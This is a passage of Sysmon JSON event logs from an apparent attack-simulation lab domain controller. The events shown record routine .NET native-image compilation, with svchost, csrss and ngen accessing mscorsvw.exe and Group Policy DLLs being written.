{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00101D990C00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:18.386\r\nProcessGuid: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nProcessId: 4780\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12ac-0\\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll\r\nCreationUtcTime: 2020-08-01 05:58:18.386","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:18.386","ProcessGuid":"{A837DB8D-047A-5F25-0000-00101D990C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12ac-0\\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll","CreationUtcTime":"2020-08-01 05:58:18.386","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.401\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010F69C0C00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.401","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010F69C0C00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.401\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010F69C0C00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.401","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010F69C0C00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.401\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010F69C0C00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.401","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010F69C0C00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.433\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00106FA00C00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.433","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00106FA00C00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.433\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00106FA00C00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.433","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00106FA00C00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.448\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00106FA00C00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.448","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00106FA00C00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:18.573\r\nProcessGuid: {A837DB8D-047A-5F25-0000-00106FA00C00}\r\nProcessId: 3744\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ea0-0\\Microsoft.GroupPolicy.Management.Interop.dll\r\nCreationUtcTime: 2020-08-01 05:58:18.573","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:18.573","ProcessGuid":"{A837DB8D-047A-5F25-0000-00106FA00C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ea0-0\\Microsoft.GroupPolicy.Management.Interop.dll","CreationUtcTime":"2020-08-01 05:58:18.573","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.589\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010DDA30C00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 